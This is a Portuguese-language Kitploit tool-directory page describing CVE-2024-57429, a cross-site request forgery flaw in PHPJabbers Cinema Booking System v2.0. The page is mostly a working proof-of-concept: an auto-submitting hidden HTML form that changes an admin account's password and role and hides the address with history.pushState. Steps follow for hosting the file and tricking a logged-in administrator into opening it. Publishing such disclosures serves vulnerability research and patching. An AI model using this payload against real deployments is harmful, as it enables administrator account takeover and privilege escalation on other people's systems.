Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-57429 — CVE-2024-57429: PHPJabbers Cinema Booking System v2.0 é vulnerável a CSRF, permitindo que atacantes elevem privilégios ao falsificar solicitações em nome de um administrador. | Kitploit
Ferramentas/GitHubGitHub/ahrixia/cve-2024-57429
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubahrixia/cve-2024-57429

CVE-2024-57429

CVE-2024-57429: PHPJabbers Cinema Booking System v2.0 é vulnerável a CSRF, permitindo que atacantes elevem privilégios ao falsificar solicitações em nome de um administrador.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-57429

Uma vulnerabilidade de cross-site request forgery (CSRF) na função pjActionUpdate do PHPJabbers Cinema Booking System v2.0 permite que atacantes remotos elevem privilégios ao enganar um administrador autenticado para submeter uma requisição não autorizada.

Impacto:

A exploração desta vulnerabilidade CSRF pode levar a ações não autorizadas, como:

  • Alterar a senha do administrador, efetivamente bloqueando-o.
  • Elevar os privilégios do atacante para administrador, atualizando sua função de usuário.

Exploit - Prova de Conceito (POC)

Cross-Site Request Forgery (CSRF)

poc.html

root@kitploit:~
<html>
 <!-- CSRF PoC - Update Admin User -->
 <body>
   <form action="http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionUpdate" method="POST">
     <input type="hidden" name="user_update" value="1" />
     <input type="hidden" name="id" value="3" />
     <input type="hidden" name="role_id" value="1" />
     <input type="hidden" name="email" value="[email protected]" />
     <input type="hidden" name="password" value="newpassword123" />
     <input type="hidden" name="name" value="Attacker" />
     <input type="hidden" name="phone" value="1234567890" />
     <input type="hidden" name="status" value="T" />
     <input type="submit" value="Submit request" />
   </form>
   <script>
     history.pushState('', '', '/');
     document.forms[0].submit();
   </script>
 </body>
</html>
  1. Salve o código acima como poc.html
  2. Hospede o arquivo em um servidor e engane o administrador para acessá-lo enquanto estiver logado na aplicação.
  3. A conta do administrador será atualizada com os detalhes e a nova senha do atacante.
Baixar ferramenta